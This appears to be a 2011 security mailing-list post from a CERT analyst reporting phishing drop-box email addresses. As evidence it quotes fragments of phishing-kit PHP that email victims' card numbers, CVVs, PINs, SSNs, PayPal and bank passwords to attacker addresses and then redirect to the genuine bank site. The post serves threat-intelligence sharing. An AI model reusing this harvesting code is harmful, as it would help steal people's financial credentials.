[nsp-sec] phishing dropboxes at gmail.com / yahoo.com / ymail.com

Rodolfo Baader rbaader at arcert.gov.ar
Fri Jan 21 13:51:11 EST 2011 

Hi!

while investigating a phishing case, we've found the followings drop boxes:
 gmail -> "zmetea at gmail.com"
 yahoo -> "redytza at yahoo.com"
 ymail -> "global.spun at ymail.com"


Evidence:
==============================================================================
[1] (...)
$to = "zmetea at gmail.com,redytza at yahoo.com";
//-----------------------------------
$Security_Num2 = $_POST['Security_Num2'];
$DOB = $_POST['DOB'];
$Security_Num = $_POST['Security_Num'];
$ip = $_SERVER['REMOTE_ADDR']; gmail -> "zmetea at gmail.com"
$subj = "($ip)IB: $Security_Num2 DOB: $DOB NUM: $Security_Num";
$msg = "ID : $Security_Num2\nYour Date of birth : $DOB\nYour Security Number :
$Security_Num\nip : $ip";
$from = "FROM:Login at resultz.com";
(...)

[2] (...)
//sending email info here
$subj = "[ $card | $cvv | $expm\$expy ]";
$msg = "CardHolder Name: $name\nDate of Birth: $a/$b/$c\nSocial Security Number:
$ssn\nMother Maiden Name: $masa\nAddress: $address\nTown/City:
$city\nProvince/Region: $state\nPostal Code: $zip\nCountry: $country\nPhone
Number: $phone\nPayPal Email: $emailp\nPayPal Password: $emailpwd\nBank Name:
$bank\nDebit / Credit Card Number: $card\nExpiration Date: $expm/$expy\nCard
Verification Number: $cvv\nPIN: $pin\nSort Code: $sort\nAccount Number:
$acc\nVBV Password: $vbv\n\n[IP: $ip | Date: $date ]";
$from = "From: TheMentor<ppl at hi5.com>";
mail("global.spun at ymail.com", $subj, $msg, $from);
header("Location: https://www.paypal.com/");
(...)

[3] (...)
//sending email info here
$subj = "User: $user | ip: $ip ";
$msg = "UserName: $user
Mother maiden name: $mother
Your password: $pass
Memorable address or place: $address
Memorable year: $year

[IP: $ip | Date: $date ]"; $from = "From: cahoot<cahoot at uk.com>";
mail("zmetea at gmail.com,redytza at yahoo.com", $subj, $msg, $from);
header("Location:
https://www.cahoot.com/ibank/core_banking/logout/logged_out.html");
(...)

==============================================================================

Regards,
R.

More information about the nsp-security mailing list